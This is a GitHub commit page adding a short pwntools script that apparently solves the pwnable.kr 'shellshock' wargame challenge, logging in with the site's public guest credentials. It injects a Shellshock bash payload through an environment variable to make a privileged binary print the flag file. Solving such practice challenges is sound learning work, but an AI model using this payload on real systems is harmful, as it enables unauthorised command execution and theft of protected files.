Skip to content

Commit 947c19b

Browse files
add shellshock sol
1 parent 017daea commit 947c19b

File tree

1 file changed

+4
-0
lines changed

1 file changed

+4
-0
lines changed

Diff for: pwnable-kr/shellshock.py

+4
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
from pwn import *
2+
s = ssh(host='pwnable.kr', port=2222, user='shellshock', password='guest')
3+
p = s.process('./shellshock', env={'MYVAR': '() { :; }; /bin/cat flag'})
4+
p.interactive()

0 commit comments

Comments
 (0)